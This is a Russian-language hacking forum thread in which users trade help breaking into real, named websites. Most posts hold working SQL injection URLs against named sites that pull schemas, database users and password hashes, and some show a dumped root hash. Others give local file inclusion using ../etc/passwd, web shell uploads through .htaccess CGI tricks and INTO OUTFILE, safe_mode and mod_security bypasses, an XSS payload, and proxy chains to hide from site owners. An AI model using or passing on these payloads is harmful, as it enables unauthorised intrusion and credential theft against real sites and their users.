http://darchat.org.ua/1/galery.php?mod=zh&id=1651&ps=seno&s=-2

Это не инъект.

а вообще можно, что нибуть с ней сотворить?

SeNaP: я уже тебе отвечал, не флуди, там конкретно есть фильтр, а то что ты -2 ввел и еррор так это просто в базу неверный запрос пошел с - числом.
мож я не прав, поправьте )

http://rcc-penza.ru/content.php?action='
http://rcc-penza.ru/content.php?action=forum&sub=viewtopic&sid='
ошибки sql, я новичек в этом) что нибудь дальше можно сделать с этим?)

мануал почитать хотябы((

2M1ks
http://rcc-penza.ru/content.php?action=forum&sub=viewtopic&sid=-1+union+select+1,2,3,4,5,6,7,8,version(),10,11--+

http://rcc-penza.ru/content.php?action=forum&sub=viewtopic&sid=-1+union+select+1,2,3,4,5,6,7,8,table_name,10,11+fr om+information_schema.tables--+

http://rcc-penza.ru/content.php?action=forum&sub=viewtopic&sid=-1+union+select+1,2,3,4,5,6,7,8,column_name,10,11+f rom+information_schema.columns+where+table_name=0x 666f72756d--+

Но в бд акаунтов вроде как нет...
Там походу на админку (http://rcc-penza.ru/admin) установлен .htaccess на доступ по ипу.

2S00pY
Я б ему не мануалы посоветовал почитать, а хотябы поверхносно изучить БД ;)
А потом уже мануаль по скулям )

Посмотрите пожалуста , здесь можно что то сделать :? http://www.melaniec.ru/news/print.php?id=9-

Посмотрите пожалуста , здесь можно что то сделать :? http://www.melaniec.ru/news/print.php?id=9-

Читаем вопрос №1.

http://forum.antichat.ru/thread104591.html

Доброго времени суток.
Помогите с SQL инъекцией.
по нормальному работает такой запрос:
SELECT
*
FROM products as p,
products_description as pd
WHERE p.products_id IN (1) and
p.products_id = pd.products_id
and pd.language_id = '1'
and p.products_status=1 order by pd.products_name limit 5

при определенном запросе можно влезть в IN ( ... )

например site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6+IN(1

получим
SELECT * FROM products as p, products_description as pd WHERE p.products_id IN (1) union select 1,2,DATABASE(),4,5,6 IN(1) and p.products_id = pd.products_id and pd.language_id = '1' and p.products_status=1 order by pd.products_name limit 5

ну и
MYSQL ERROR REPORT
- 13/05/2009 11:05:58
---------------------------------------
1109 - Unknown table 'p' in field list

Я не очень в SQL, потому не получается у меня состряпать что-то полезное))

Спасибо.

попробуй делать site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6/* или в конце +-- или %23
или site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6+from+product s as p, products_description as pd WHERE p.products_id+IN(1
Ну и естественно там не обязательно 6 столбцов.

попробуй делать site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6/* или в конце +-- или %23

это не работает...


или site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6+from+product s as p, products_description as pd WHERE p.products_id+IN(1
Ну и естественно там не обязательно 6 столбцов.
ну да, там получается 44 столбца и
site/compare.php?cPath=&products[]=1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,DATABASE(),37,38,39,40,41,42,43,44+fr om+products as p, products_description as pd WHERE p.products_id+IN(1
работает отлично.... только вот ешё вопрос:
можно ли сделать UPDATE, INSERT ? и как? :)

Ну если ты получишь полноценный доступ к бд, то можно(правда не всегда). А через sql inj нельзя.

У меня вот какой вопрос. я через sql enjection нашел в бд логин и пас к админке. и еще есть таблица admin_ip в ней 15 айпи. когдла я пытаюсь зайти в админку то пишет доступ запрещен. Видимо проходит проверка на ип. если мой ип совпадает с одним ип из таблицы админ_ип то меня допускают к вводу пароля. как это обойти - проверку по ип?

kakim libo sposobom vstavit' svoi ip v etu tablicu

xm. ili otpravlyaya paket izmenit' x_forwarded_for
mb v zaprose est' skulya
nu eto tak, mysli vslux

x_forwarded_for
remote_ip

jelatel'no posmotret' skript kotoryi proveryaet ip, tak slojno skazat'

Да врядли там на эти переменные смотрят
x_forwarded_for
remote_ip


не лохи же они.


смотрят только remote_addr обычно...А его подделать трудно.

не лохи же они.

Многие так думают, и слава босху:)

Без скрипта выводы делать нельзя, "может быть, наверное" - вот это лоховство. Надо точно знать

попугай Его подделать не возможно =)

2 Doom123:

Ну я бы так не сказал. Вот как ты на php, например, определишь, что чел сидит через прокси? Просто взяв $_SERVER['REMOTE_ADDR']? Не всё так сложно, как кажется:)

А если анонимная прокси? А если элитная прокси? А если вообще связка носков по всему миру?

А если цепочка шеллов? :)

А если цепочка шеллов? :) Ты сам понял что сказал? Ты имеешь в виду цепочку прокси? (Или с каждого шелла стучаться на другой сайт - в чём отличие?)

при http://www.site.ru/news/?i=4343'
вот это
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''4343'' ORDER BY `news_date` DESC,`id` DESC' at line 10
изменить запрос можно, проверил
может криво проверил, просто дальше не получается
помогите кто нить, за сайтом в личку

Pashkela я к тому что он сказал "А его подделать трудно."
переопределить значение этой переменной не возможно ... например ты не можешь сделать так чтоб там было 0.0.0.0 =)

navigat0r читай статьи по скуль иньекции =)

navigat0r, похоже на скулю в ордере. Смотри линк в прикрепленной статье jokester`a.

$n@ke, скуля до ORDER BY, смотри запрос:

to use near ''4343'' ORDER BY `news_date` DESC,`id` DESC' at line 10

Число 4343, до ORDER BY, а не после.

решил просканировать скуль сканером домены связанные с Голливудом)) (Сам я новичек в поиске уязвимостей, кроме азов). Ну так вот, сканер выдал вот это: http://hollywoodrivierarealestate.com/ (MSSQL Injection)

1.Я не понимаю что и как дальше искать.....Что посоветуете?
2. Нашел админку по адресу http://www.hollywoodwiretap.com/admin/login.php . Что посоветуете делать с ней, чтобы попасть внутрь))

Сканер должен был сказать в каком скрипте инъект!
Вот его и крути...по MSSQL Injection читать тут:
http://forum.antichat.ru/thread30501.html
2. ввести пароль)

Что я нашол беглым осмотром:
инклуд
http://www.hollywoodwiretap.com/?module='
На сервере включен magic_quotes так как даные слешируются...

bug1z, а какой сканер посоветуешь?

NMAP или XSPIDER
Но помни, что пока лутший известный сканер - это человеческий мозг. Собери под него базу! (c)Elekt

Скуля тоже есть вывод в тайтле

http://www.hollywoodwiretap.com/?module=news&action=page&category=-1+union+select+1,2,table_name,4,5,6+from+informati on_schema.tables

jecka3000, если ты новичок - самое глупое что можно сделать - юзать тупые сканеры. Читай статьи и учись искать уязвимости сам

Слушыл, что если вфоруме есть тег [php], то его как то можно использовать. Правдо ли то? Если да, то как его юзать

2Flair
Данный баг пашет не везде!
Давай разберёмся как он работает:

$row['text'] = str_replace('','<table style="border: 1px solid #06499d; padding: 0px;" width="100%"><tr><td align="left" style="padding: 10px 12px"><left><b><u><font color="#06499d">Êîä:</font></u></b></left><br><font color="#06499d">', $row['text']);
$row['text'] = str_replace('[/p*hp]','</td></tr></table><br></font>', $row['text']);


То есть

[p*hp] заменяется на


<table style="border: 1px solid #06499d; padding: 0px;" width="100%"><tr><td align="left" style="padding: 10px 12px"><left><b><u><font color="#06499d">Êîä:</font></u></b></left><br><font color="#06499d">

а



на закрытие тегов:

</td></tr></table><br></font>

То есть если нет фильтрации, то мы можем вставить свой код!

Пример:

[p*hp]<script>alert('lol')</script>[/p*hp]

В коде это будет выглядеть так:

<table style="border: 1px solid #06499d; padding: 0px;" width="100%"><tr><td align="left" style="padding: 10px 12px"><left><b><u><font color="#06499d">Eia:</font></u></b></left><br><font color="#06499d"><script>alert('lol')</script></td></tr></table><br></font>

Еще один вопрос. Нашел на сайте скулю. Какими командами заставить вывести лоигн и пароль администратора (пускай даже в виде хэша)?

jecka3000 читай мануалы =\
Тут специалисты не собираються переписывать мануалы

jecka3000 Смотри >>Здесь<< (http://forum.antichat.ru/thread104591.html)

Еще один вопрос. Нашел на сайте скулю. Какими командами заставить вывести лоигн и пароль администратора (пускай даже в виде хэша)?

адаймнехешсволочь!
Вот такая команда везде работает

wildshaman, мб мы не будем флудить??

Еще один вопрос. Нашел на сайте скулю. Какими командами заставить вывести лоигн и пароль администратора (пускай даже в виде хэша)?

Возьмём за пример твою же скулю, тоторую ты выклодовал:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

Мы видим что принтабельный столбец - 2
Проверим версию БД выполнив команду version()

http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11+fro m+mysql.user/*

получаем:
4.0.23a-log

Это значит, что название таблиц и колонок прийдётся подбирать вручную, так как в 4-той версии нет прекрасной INFORMATION_SCHEMA
Но изучив бд mysql мы уже знаем, что там присутствуют колонки user и password
Имея эти даные мы составляем следующие запрос к базе данных:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,user,3,4,5,6,7,8,9,10,11+from+mys ql.user/*

http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,password,3,4,5,6,7,8,9,10,11+from +mysql.user/*

Но ведь не удобно состовлять несколько запросов, не так ди?

Для этого можно использовать функцию concat() или concat_ws()
Пример:

http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,concat_ws(0x3a,user,password),3,4 ,5,6,7,8,9,10,11+from+mysql.user/*

И получить всё и сразу:

root:0e420e231935eccd

0x3a - это двоеточие в хексе!


##################################

Для начала посоветую тебе почитать литературу по php и sql.
После чего можешь приступать к чтению статтей по sql inj

wildshaman, мб мы не будем флудить??



Возьмём за пример твою же скулю, тоторую ты выклодовал:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

Мы видим что принтабельный столбец - 2
Проверим версию БД выполнив команду version()

http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11+fro m+mysql.user/*

получаем:
4.0.23a-log

Это значит, что название таблиц и колонок прийдётся подбирать вручную, так как в 4-той версии нет прекрасной INFORMATION_SCHEMA
Но изучив бд mysql мы уже знаем, что там присутствует такая таблица как mysql, а в ней колонки user и password
Имея эти даные мы составляем следующие запрос к базе данных:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,user,3,4,5,6,7,8,9,10,11+from+mys ql.user/*

http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,password,3,4,5,6,7,8,9,10,11+from +mysql.user/*

Но ведь не удобно состовлять несколько запросов, не так ди?

Для этого можно использовать функцию concat() или concat_ws()
Пример:

http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,concat_ws(0x3a,user,password),3,4 ,5,6,7,8,9,10,11+from+mysql.user/*

И получить всё и сразу:

root:0e420e231935eccd

0x3a - это двоеточие в хексе!


##################################

Для начала посоветую тебе почитать литературу по php и sql.
После чего можешь приступать к чтению статтей по sql inj
очень замечательная для обучения скуль :)
magic_quotes_gpc=off
file_priv=Y
FreeBSD (!) в общем классно.

bug1z, только как мы видим что принтабельный столбец №2 ?

2jecka3000
при запросе http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
вывелась двойка и тройка!
можешь сипользовать любой!

на сервере safe_mode=on и disable_functions=passthru, shell_exec, proc_open. Могу инклудить php-код и читать папки и файлы только в папке htdocs и во вложенных, система FreeBSD 6.4-RELEASE-p3. Как при таком раскладе можно выполнять комманды на сервере? Подскажите люди добрые!

заливай перловый шелл

заливаешь в папку .htaccess
пишешь в него
Options ExecCGI
AddType application/x-httpd-cgi .pl

заливаешь в эту папку shell.pl
ставишь на него chmod 755
и вуаля. Хороший перловый шелл - r57pws - гугл в помощь

jecka3000 только как мы видим что принтабельный столбец №2 ?
Это у тя на страничке отображается......
---------------------------------------
Актуальные мероприятия партнеров
2

Вопросик есть
http://www.site.ru/index.php?Id=-1+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12+FROM+U SERS+LIMIT+0,1+%23+

все цифры выводит на ура, но если например вместо 1 ил 3 написать user() или еще чет то еррор

mysql_num_rows(): supplied argument is not a valid MySQL result resource in ....index.php on line 459


как исправить?

-1+UNION+SELECT+0,unhex(hex(version())),2,3,4,5,6,7 ,8,9,10,11,12+FROM+U SERS+LIMIT+0,1+%23+

неа, не работает вот еще что нашел
Id=-1+UNION+SELECT+0,user(),2,3,4,5,6,7,8,9,10,11,12+F ROM+USERS+LIMIT+1,1+%23+

выводит Юзера

Id=-1000+UNION+SELECT+0,user(),2,3,4,5,6,7,8,9,10,11,1 2+FROM+USERS+LIMIT+1,1+%23+
Не выводит Юзера

но сам прикол что выводит только юзера, пишешь версию и еррор

позоду стоит проверка на кол символом, вводишь 0x2b норм вводишь чет длиннее и ниче, как можно обойти?

Кидай в пм ссылку, посмотрим.

Залил 2 перловых файла одинакового содержания:
#!/usr/bin/perl
print "Content-Type:text/html\n\n";
print "HELLO WORLD!\n";
назвал их perl.pl и perl.cgi
права у обоих 755
содержимое .htaccess было таким:
Options +ExecCGI
AddHandler cgi-script .cgi .pl
и таким:
Options ExecCGI
AddHandler cgi-script .cgi .pl
и таким:
Options +ExecCGI
AddHandler cgi-script .cgi .pl
ScriptInterpreterSource registry
и таким:
Options +ExecCGI
AddType application/x-httpd-cgi .pl .cgi
и таким:
Options +ExecCGI
AddType application/x-httpd-cgi .pl .cgi
ScriptInterpreterSource registry
и таким:
Options +ExecCGI
AddHandler cgi-script .cgi .pl
AddType application/x-httpd-cgi .pl .cgi
права на .htaccess 744
Владелец скриптов: 80/4962 (uid/gid)
У папки, в которой лежат скрипты права 777, владелец - 4962/4962
Запись в папку cgi-bin запрещена (права 755)
И всё время - ошибка 500 Internal Server Error!!! Что делать я не знаю, подскажите пожалуйста!
А да забыл написать, символы \r из концов строк я удалил.

сейф возможно обойти? Каким образом?...помогите =))

Залей шелл который работает при включеном Safe-mode
Или же пробуй это:
http://www.rohitab.com/cgiscripts/cgitelnet.txt
переменуй в *.cgi и помести в папку cgi-bin с правами 755 и с помощю скрипта переходи дальше..

А посоветовать что нить конкретное можешь?

Или же пробуй это:
http://www.rohitab.com/cgiscripts/cgitelnet.txt
переменуй в *.cgi и помести в папку cgi-bin с правами 755 и с помощю скрипта переходи дальше..
Добраться бы до неё...

http://www.uvm.edu/~uvmsga/documents/c99.php

Здесь сейф возможно обойти? Каким образом?...помогите =))
ровно на 1 пост выше своего читай :)

А посоветовать что нить конкретное можешь?

Добраться бы до неё...

Методы обхода ограничений PHP safe mode:

http://xakep.ru/magazine/xa/081/054/1.asp

Хотелось бы узнать, какой из способов безопасности лучший при выполнении поиска уязвимостей? (Прокси, прокси софт, др.софт, дедики и т.д.), т.к. наверное мало какому админу понравится подозрительные запросы в его логе)

цепочка проксей или VPN
Если ты тестишь какой то известный движок - то пробей ветсию, скачай его и тести на локалхосте.

Для построения цепочки проксей можно использовать программу FreeCap

http://www.site.com/articles.php?section=12&subsection=1&lang=0/*
выдаёт следующее
Warning: pg_query(): Query failed: ERROR: незакрытый комментарий /* в или рядом "/*) AND (sections.sectionid = articles.section ) AND (articles.section = subsections_templates_captions.id_section) AND (articles.subsection = subsections_templates_captions.id_subsection) AND (articles.lang = subsections_templates_captions.id_lang) AND (articles.section = sections_captions.id_section) AND (articles.lang = sections_captions.id_lang) ) ORDER BY ord OFFSET 0 LIMIT 20 " at character 711 in /usr/www/site.com/classes/DBHelper.class.php on line 506
Can not execute query
при подстановке кавычки:
Warning: pg_query(): Query failed: ERROR: ошибка синтаксиса в или рядом "\" at character 711 in /usr/www/site.com/classes/DBHelper.class.php on line 506
Can not execute query
хелп плизз

ставь -- в конце должно помоч, или сайт в личку вместе посмотрим

navigat0r - Это PostgreSQL
Прочитай => Проведение SQL-Injection в PostgreSQL (http://forum.antichat.ru/thread104591.html) <=

ставь -- в конце должно помоч, или сайт в личку вместе посмотрим
при подстановке --
Warning: pg_query(): Query failed: ERROR: ошибка синтаксиса в или рядом "(" at character 722 in /usr/www/site.com/classes/DBHelper.class.php on line 506
Can not execute query
если ничего у мя не выйдет с вашей помощью, кину на всеобщее рассмотрение.

Кинь в ПМ посмотрим.......

navigat0r, HAXTA4OK, farex
Прочтите ошибку повниметельнее
Warning: pg_query(): Query failed: ERROR: незакрытый комментарий /* в или рядом "/*) AND (sections.sectionid = articles.section ) AND (articles.section = subsections_templates_captions.id_section) AND (articles.subsection = subsections_templates_captions.id_subsection) AND (articles.lang = subsections_templates_captions.id_lang) AND (articles.section = sections_captions.id_section) AND (articles.lang = sections_captions.id_lang) ) ORDER BY ord OFFSET 0 LIMIT 20 " at character 711 in /usr/www/site.com/classes/DBHelper.class.php on line 506
Can not execute query
Прежде чем комментировать, надо все скобки закрыть.
цепочка проксей или VPN
Если ты тестишь какой то известный движок - то пробей ветсию, скачай его и тести на локалхосте.

Для построения цепочки проксей можно использовать программу FreeCap
На вопрос "Какой лучший?" ответ прокси никак не подходит из-за отсутствия шифрования между твоей тачкой и самой проксей.

Должен признать, что у мну не хватает компетентности в PostgreSQL....
Так что, кидай на всеобщее обозрения.

http://www.e3e5.com/articles.php?section=12&subsection=1&lang=0
у кого что получится, просьба сообщать
oRb, как все скобки закрыть?

Как в MsSQL сделать объеденение? Ну типа как в мусскуле concat() concat_ws()

cast(name+as+nvarchar)%2B%27%3A%27%2Bcast(password +as+nvarchar)
это =>%2B%27%3A%27%2<=, как не трудно догадаться закодированное => +':'+<=
к примеру так выведется колонки "name","password"

А если magic_quotes включены?

Разобрался... CHAR() рулез =)

кто нить откликнитесь и на мою просьбу

Кстати, есть ли подобие СИПТа, только для MsSQL? Просто ща пишу такую софтину, и хочу узнать, есть ли что-то подобное...

mailbrush, sipt же и так для MsSQL

SIPT не работет с MsSQL

уважаемые, подскажите, какую именно XSS атаку можно провести на ресурс, если на нем доступен метод TRACE ( Может быть, на конкретных примерах)

http://www.e3e5.com/articles.php?section=12&subsection=1&lang=0
у кого что получится, просьба сообщать
oRb, как все скобки закрыть?
Почему-то отрезать лишнее комментарии не получается, но можно и по другому модифицировать запрос.
http://www.e3e5.com/articles.php?section=-12))+union+select+null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null+from+section s_captions+where+((1=1
Warning: pg_query(): Query failed: ERROR: колонка "ord" не существует in /usr/www/phpe3e5.com/classes/DBHelper.class.php on line 506подобрать нужную таблицу не удалось. Решил поискать более подходящий инъект. Нашел этот
http://www.e3e5.com/author.php?id=-1018))+union+select+null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null+ from+author+where+((1=1
Warning: pg_query(): Query failed: ERROR: ошибка синтаксиса в или рядом ")" at character 314 in /usr/www/phpe3e5.com/classes/DBHelper.class.php on line 403 2 скл запроса =/ Вывод сделать врядли получится. Но можно воспользоваться аналогом "more that 1 row".
http://www.e3e5.com/author.php?id=-1018))+union+select+null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null+ from+author+where+((1=(select+1,2)+
Warning: pg_query(): Query failed: ERROR: подзапрос должен вернуть только одну колонку in /usr/www/phpe3e5.com/classes/DBHelper.class.php on line 678 Но это ты уж сам. Удачи ;)

Кстати, есть ли подобие СИПТа, только для MsSQL? Просто ща пишу такую софтину, и хочу узнать, есть ли что-то подобное...
pangolin:
http://raz0r.name/obzory/pangolin-sql-inekcii-teper-ne-utomlyayut/
http://nosec.org/en/pangolin_download.html
и дампилка на перле:
http://forum.antichat.ru/showpost.php?p=236188&postcount=3

http://pashkela.narod.ru/progi/bsqlbf-v2.1.zip

Pashkela, синтаксис я знаю, уже почти на каждом "хэк"-портале статтейку прочитал.
laedafess, спс...

http://www.strongcube.com/download.php?product=-2'

Союственно и вопрос, как подобрать, все работает но на Юнионе рубает

http://www.strongcube.com/download.php?product=-2+union/**/select+concat_ws(0x3a,user(),database(),version()) ,2,3

Просто какой-то мод (mod_security) если видит union+select в запросе, тогда Forbidden

Можите потсказать, как можно залить шелл через SQL inj?
version- 5

через into outfile

Пример можете показать :confused:

select '<?phpinfo()?>' into outfile '/tmp/shell.php'

если union select file_priv from mysql.user

будет "y"

уважаемые, подскажите, какую именно XSS атаку можно провести на ресурс, если на нем доступен метод TRACE ( Может быть, на конкретных примерах)

Ты все же решил проигнорировать наш совет насчет сканеров уязвимостей да ? Вот спросил бы у разработчика хспайдера какую там атаку он хотел провести и много ли раз у него это получалось :/

http://www.inattack.ru/article/516.html пункт 3 XSS-нападения методом TRACE.

вот от нечего делать нашел скулю на сайте московского образования: http://forum.mioo.ru/ege2010/rt1.php?firstrow=20'
Но дальше раскрутить никак не могу, даже подобрать столбцы не удается. Если кому то интересно, поvогите, расскажите как раскрутить дальше до вида login ; md5 PASS

jecka3000, там инъекия в limit'e, так что забудь про эту скулю. Ищи другие.

jecka3000 не смотрел но если oRb прав то вот :
http://www.securitylab.ru/contest/212083.php - есть пункт про иньекцию в лимите
http://forum.antichat.ru/showthread.php?t=56446 - просто тема про иньекцию в лимите

есть ли генератор на php
в который ввел значение типа "pg_users"
А она тебе примерно это

chr(111)||chr(110)||chr(97)

?

есть ли генератор на php
в который ввел значение типа "pg_users"
А она тебе примерно это

chr(111)||chr(110)||chr(97)

?

это тебе к кодерам надо обратиться...

diznt, стукни в аську мне, 674542, накатаю.

есть ли генератор на php
в который ввел значение типа "pg_users"
А она тебе примерно это

chr(111)||chr(110)||chr(97)

?
Если нужно на js - могу поделиться.

http://www.fshsh.org/lajmi.php?id=-47+union+select+1,2,3,4,5--

но

http://www.fshsh.org/lajmi.php?id=-47+union+select+1,version(),3,4,5--

ничего не выводит. unhex(hex(version())) и др. кодирование не помогает.. Как раскрутить ее?

2 diznt:

скачать (http://pashkela.narod.ru/progi/encoder1.0.rar)

2 ПаВлУшКа:

http://www.fshsh.org/lajmi.php?id=-47+union+select+1,2,@@version,4,5--

Pashkela, а дальше? Как узнать имена таблиц, колонок?

через information_schema пробуй =)

Doom123, естественно через нее, вот только не выводится ничего..

что можно дальше с этим сделать?
Но можно воспользоваться аналогом "more that 1 row".
http://www.e3e5.com/author.php?id=-1018))+union+select+null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null+ from+author+where+((1=(select+1,2)+

2 ПаВлУшКа:

А дальше включать мосг, подумав решить, что ЭТА скуля тупая и нам не нужна и найти на этом же сайте другую, ХОРОШУЮ скулю:


http://www.fshsh.org/kalendaridetaj.php?id=-4+union+select+1,2,3,4,version()




http://www.fshsh.org/kalendaridetaj.php?id=-4+union+select+1,2,3,4,table_name+from+information _schema.tables

Подскажите:
Есть форма авторизации там есть
<select id="number" name="number">
<OPTION value="aa">1</OPTION>
<OPTION value="bb">2</OPTION>
<OPTION value="cc">3</OPTION>
<OPTION value="dd">4</OPTION>
</select>
и кнопка отправки, данные форма передаёт файлу login.php
после изменения в форме value="aa" например на value="aa2" то после отправки запроса выдаёт ошибку примерно такого содержания
Warning: require_once(configaa2.php) [function.require-once]: failed to open stream: No such file or directory in /var/www/site/htdocs/login.php on line 103 Fatal error: require_once() [function.require]: Failed opening required 'configaa2.php' (include_path='.:/usr/share/php5:/usr/share/php') in /var/www/site/htdocs/login.php on line 103
Подскажите что можно тут выполнить?например чтонибудь связаное с инклудом другого файла

p.s извеняйте за обьяснение, как смог(

По идее локальный инклуд, а как реализовать - хз, смотреть надо. Но в личку просьба пароли и прочее не кидать!

Дорогие друзья!
Т.к. уважаемый товарищ Pashkela официально отказался от приема важной информации в ЛС, которой вы наверное безудержно хотите поделиться, я вас грандиозно обрадую! Теперь у вас есть неповторимая нигде возможность отправить все пассы\шеллы и т.п. мне в личку!
З.Ы
по возможности, оформляйте все красиво и удобно, чтобы мне не приходилось искать на всяких сайтах "бесполезные инклуды"

С любовью, ваш Iceangel_ .



P.S.
Дабы сообщение не входило в разряд "флуда", дам пару советов ))
2 Aleksandeer
ну а что тебе мешает попробовать инклуднуть что-нибудь?
2 navigat0r
наверное это можно хекноть

Как обнулить сессии в бд?
То есть чтобы всех юзеров выкинуло в тупую, но надо через БД это все сделать

Двиг SMF

Подскажите:
Есть форма авторизации там есть
<select id="number" name="number">
<OPTION value="aa">1</OPTION>
<OPTION value="bb">2</OPTION>
<OPTION value="cc">3</OPTION>
<OPTION value="dd">4</OPTION>
</select>
и кнопка отправки, данные форма передаёт файлу login.php
после изменения в форме value="aa" например на value="aa2" то после отправки запроса выдаёт ошибку примерно такого содержания
Warning: require_once(configaa2.php) [function.require-once]: failed to open stream: No such file or directory in /var/www/site/htdocs/login.php on line 103 Fatal error: require_once() [function.require]: Failed opening required 'configaa2.php' (include_path='.:/usr/share/php5:/usr/share/php') in /var/www/site/htdocs/login.php on line 103
Подскажите что можно тут выполнить?например чтонибудь связаное с инклудом другого файла

p.s извеняйте за обьяснение, как смог(

а можно ссылку посмотреть?
может там можно произвести php-injection по принципу закрыть функцию подключения конфига ");" и вставить свой рнр код...

Подскажите:
Есть форма авторизации там есть
<select id="number" name="number">
<OPTION value="aa">1</OPTION>
<OPTION value="bb">2</OPTION>
<OPTION value="cc">3</OPTION>
<OPTION value="dd">4</OPTION>
</select>
и кнопка отправки, данные форма передаёт файлу login.php
после изменения в форме value="aa" например на value="aa2" то после отправки запроса выдаёт ошибку примерно такого содержания
Warning: require_once(configaa2.php) [function.require-once]: failed to open stream: No such file or directory in /var/www/site/htdocs/login.php on line 103 Fatal error: require_once() [function.require]: Failed opening required 'configaa2.php' (include_path='.:/usr/share/php5:/usr/share/php') in /var/www/site/htdocs/login.php on line 103
Подскажите что можно тут выполнить?например чтонибудь связаное с инклудом другого файла

p.s извеняйте за обьяснение, как смог(


пробуй value="/../../../../../etc/passwd%00"

если магик квотес офф - то кульно будет

Вопрос по PostgreSQL иньекцию

Вывожу из базы pg_user логины потом пытаюсь вывести пароли а там звездочки! что делать? или звездочки это существенно в PostgreSQL и раскрыть их незя?

Вопрос по PostgreSQL иньекцию

Вывожу из базы pg_user логины потом пытаюсь вывести пароли а там звездочки! что делать? или звездочки это существенно в PostgreSQL и раскрыть их незя?
Это норма для PostgreSQL...

Объясните winstrool и попугаю почему они сморозили херню=\
jokester, давай!

Винстул,попугай, а где вы видите форму ввода о.О
Там вообщето менюха позволяющая выбрать либо 1 либо 2 либо 3...

Объясните winstrool и попугаю почему они сморозили херню=\
jokester, давай!


щито?

Винстул,попугай, а где вы видите форму ввода о.О
Там вообщето менюха позволяющая выбрать либо 1 либо 2 либо 3...



Чтоо? Он же сам показал ,что форма ввода там..

Есть форма авторизации там есть
<select id="number" name="number">
<OPTION value="aa">1</OPTION>
<OPTION value="bb">2</OPTION>
<OPTION value="cc">3</OPTION>
<OPTION value="dd">4</OPTION>
</select>
и кнопка отправки, данные форма передаёт файлу login.php

Объясните winstrool и попугаю почему они сморозили херню=\
jokester, давай!
yes sir!!! :)

По приказу вышестоящего начальства объясняю:

При передачи значения /../../../../lololo в переменную value сценарий попытается включить файл
config/../../../../lololo.php. Даже если расширение удастся отбросить нулбайтом или слешами, то в 90% случаев инклуд не пролезет если папки config не существует.
Хотя , я где-то читал, что при какой-то конфигурации PHP+Linux может пролезть и при несуществующей папке. В винде будет работать на ура , независимо от наличия папки.
а можно ссылку посмотреть?
может там можно произвести php-injection по принципу закрыть функцию подключения конфига ");" и вставить свой рнр код...
Это если чесно совсем не понял. Если можно покажи пример того, что ты хотел сделать и пример кода при котором это может сработать

diznt
В этой таблице нет паролей, они хранятся в pg_shadow но на её прочтения у тебя 99% не хватит прав

include('/usr/local/apachgo/testinclud/../../../../../etc/passwd');

Software: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635. PHP/5.2.9 работает

Software: Apache/2.2.3 (Debian) DAV/2 PHP/4.4.4-8+etch6 mod_ssl/2.2.3 OpenSSL/0.9.8c. PHP/4.4.4-8+etch6 работает

Software: Apache/1.3.37 (Unix) mod_perl/1.29 mod_ssl/2.8.28 OpenSSL/0.9.8d PHP/4.4.7
uname -a: SunOS jan 5.8 Generic_117350-54 sun4u работает

Software: Apache/1.3.34 (Debian) PHP/4.4.4-8+etch6. PHP/4.4.4-8+etch6 работает

Software: Apache/2.0.63. PHP/5.2.6
uname -a: Linux raffles 2.6.18-6-686-bigmem #1 SMP Tue May 5 02:00:57 UTC 2009 i686 работает

в Большинстве случаев работает как раз

http://art.specialradio.ru/index.php?id=-399+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9

может кто-то докавыряет дальше...

с этим можно что-то сделать?
http://www.telemultimedia.ru/news.php?id=2702'

При передачи значения /../../../../lololo в переменную value сценарий попытается включить файл
config/../../../../lololo.php. Даже если расширение удастся отбросить нулбайтом или слешами, то в 90% случаев инклуд не пролезет если папки config не существует.
Хотя , я где-то читал, что при какой-то конфигурации PHP+Linux может пролезть и при несуществующей папке, но на практике не встречал. В винде будет работать на ура , независимо от наличия папки.
я сто раз встречал такую ситуацию)

Обсуждалось это, ну или примерно это вот тут :
https://forum.antichat.ru/showthread.php?t=98525

']где existing_dir имя существующей папки
в некоторых версиях PHP (e.g. 5.1.2) на linux имя папки может быть любым

Вот пост по теме из той-же ветки
https://forum.antichat.ru/showpost.php?p=1024096&postcount=37
']это относится к linux, хотя это понятие растяжимое ) на все том же FreeBSD 6.3, PHP 5.2.8 через несуществующую папку не инклудится =\

Сейчас провели несколько тестов , респект Qwazar и BlackSun

На лине везде работает (но это тесты, тоесть то, что было под рукой) , на фре работает вот так:
[13:05:49] <BlackSun> тобишь include("/asdasdasd/../../../../../../../../../../../../../../../../../../../usr/local/www/site.ru/www/docs/_vt_log/htaccess.php"); пашет
[13:05:52] <BlackSun> include("asdasdasd/../../../../../../../../../../../../../../../../../../../usr/local/www/site.ru/www/docs/_vt_log/htaccess.php"); - нет
Тоесть случай из примера не сработает

